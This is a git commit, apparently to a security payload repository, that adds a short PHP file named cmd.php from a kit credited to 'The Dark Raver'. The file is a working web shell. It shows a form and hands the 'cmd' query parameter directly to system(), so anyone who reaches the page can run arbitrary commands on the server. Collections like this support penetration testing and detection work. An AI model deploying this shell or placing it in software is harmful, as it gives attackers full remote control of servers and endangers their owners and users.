Many additions to the repository...

This commit is contained in:
Daniel Miessler
2012-08-26 20:04:09 -07:00
parent 6f52e9bd4a
commit b9e6418c48
113 changed files with 824123 additions and 1 deletions

View File

@@ -0,0 +1,25 @@
<?
//
// PHP_KIT
//
// cmd.php = Command Execution
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>